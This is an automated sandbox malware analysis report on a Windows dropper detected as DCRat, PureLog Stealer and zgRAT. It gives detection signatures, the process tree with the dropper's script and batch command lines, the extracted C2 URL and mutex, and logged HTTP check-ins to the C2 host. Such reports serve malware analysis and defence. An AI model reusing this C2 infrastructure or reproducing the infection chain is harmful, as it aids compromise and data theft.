Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HcEvQKWAu2.exe

Overview

General Information

Sample name:HcEvQKWAu2.exe
renamed because original name is a hash value
Original sample name:3a92479aa98e55499bfa33bc2ea35b64.exe
Analysis ID:1549036
MD5:3a92479aa98e55499bfa33bc2ea35b64
SHA1:2645ee34fe180b3c775fec79729f5ecee1dab95f
SHA256:cc8ffd463272f8abfb56f7f6c7a83ade8137e8df4c8cf39926469bf54efd1f71
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • HcEvQKWAu2.exe (PID: 8 cmdline: "C:\Users\user\Desktop\HcEvQKWAu2.exe" MD5: 3A92479AA98E55499BFA33BC2EA35B64)
    • wscript.exe (PID: 5296 cmdline: "C:\Windows\System32\WScript.exe" "C:\ComponentSavesinto\Rvb4MehGYPWwP7mOC7L2KZoGBB7qbkXbVDhXcse7w1B6.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 2020 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ComponentSavesinto\ZNtisV5JM91TmuX3tDFXvJx7ah2q8kJOB5hVZXHXTCGj5p.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • fontReviewsavesinto.exe (PID: 1648 cmdline: "C:\ComponentSavesinto/fontReviewsavesinto.exe" MD5: 5B7391CD38F6218CD0E5C8F3899AB4DD)
          • cmd.exe (PID: 6960 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\F0ZVhIKmod.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7216 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 7232 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • fontReviewsavesinto.exe (PID: 7392 cmdline: "C:\ComponentSavesinto\fontReviewsavesinto.exe" MD5: 5B7391CD38F6218CD0E5C8F3899AB4DD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral", "MUTEX": "DCR_MUTEX-CaL7zfwyS1Lcmm7w4GYk"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
HcEvQKWAu2.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    HcEvQKWAu2.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\ComponentSavesinto\WmiPrvSE.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\ComponentSavesinto\WmiPrvSE.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\ComponentSavesinto\fontReviewsavesinto.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\ComponentSavesinto\fontReviewsavesinto.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Recovery\Registry.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 7 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000011.00000002.3686700129.0000000003406000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  0000000B.00000000.1319319511.0000000000612000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000000.00000003.1221219115.0000000006F81000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000000.00000003.1221537345.0000000004F2B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        00000000.00000003.1220726109.0000000006680000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          Click to see the 4 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              11.0.fontReviewsavesinto.exe.610000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                11.0.fontReviewsavesinto.exe.610000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  0.3.HcEvQKWAu2.exe.66ce702.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 5 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Files With System Process Name In Unsuspected Locations
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ComponentSavesinto\fontReviewsavesinto.exe, ProcessId: 1648, TargetFilename: C:\ComponentSavesinto\WmiPrvSE.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ComponentSavesinto\Rvb4MehGYPWwP7mOC7L2KZoGBB7qbkXbVDhXcse7w1B6.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ComponentSavesinto\Rvb4MehGYPWwP7mOC7L2KZoGBB7qbkXbVDhXcse7w1B6.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\HcEvQKWAu2.exe", ParentImage: C:\Users\user\Desktop\HcEvQKWAu2.exe, ParentProcessId: 8, ParentProcessName: HcEvQKWAu2.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ComponentSavesinto\Rvb4MehGYPWwP7mOC7L2KZoGBB7qbkXbVDhXcse7w1B6.vbe" , ProcessId: 5296, ProcessName: wscript.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-11-05T08:12:16.386372+010020229301A Network Trojan was detected20.12.23.50443192.168.2.749720TCP
                                    2024-11-05T08:12:55.057943+010020229301A Network Trojan was detected20.12.23.50443192.168.2.749975TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-11-05T08:12:18.601542+010020480951A Network Trojan was detected192.168.2.74974537.44.238.25080TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: HcEvQKWAu2.exeAvira: detected
                                    Antivirus detection for URL or domain
                                    Source: http://427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral.phpAvira URL Cloud: Label: malware
                                    Antivirus detection for dropped file
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Recovery\Registry.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\ComponentSavesinto\Rvb4MehGYPWwP7mOC7L2KZoGBB7qbkXbVDhXcse7w1B6.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\F0ZVhIKmod.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\ComponentSavesinto\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Found malware configuration
                                    Source: 00000011.00000002.3686700129.0000000003406000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral", "MUTEX": "DCR_MUTEX-CaL7zfwyS1Lcmm7w4GYk"}
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\ComponentSavesinto\WmiPrvSE.exeReversingLabs: Detection: 87%
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeReversingLabs: Detection: 87%
                                    Source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exeReversingLabs: Detection: 87%
                                    Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\kRoaRVhtzmWNJQRz.exeReversingLabs: Detection: 87%
                                    Source: C:\Recovery\Registry.exeReversingLabs: Detection: 87%
                                    Source: C:\Windows\Vss\Writers\Application\kRoaRVhtzmWNJQRz.exeReversingLabs: Detection: 87%
                                    Multi AV Scanner detection for submitted file
                                    Source: HcEvQKWAu2.exeReversingLabs: Detection: 63%
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeJoe Sandbox ML: detected
                                    Source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exeJoe Sandbox ML: detected
                                    Source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exeJoe Sandbox ML: detected
                                    Source: C:\Recovery\Registry.exeJoe Sandbox ML: detected
                                    Source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exeJoe Sandbox ML: detected
                                    Source: C:\ComponentSavesinto\WmiPrvSE.exeJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: HcEvQKWAu2.exeJoe Sandbox ML: detected
                                    Source: HcEvQKWAu2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: HcEvQKWAu2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: HcEvQKWAu2.exe
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F8A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00F8A69B
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F9C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00F9C220
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00FAB348 FindFirstFileExA,0_2_00FAB348

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49745 -> 37.44.238.250:80
                                    Source: Joe Sandbox ViewIP Address: 37.44.238.250 37.44.238.250
                                    Source: Joe Sandbox ViewASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR
                                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.7:49720
                                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.7:49975
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 336Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
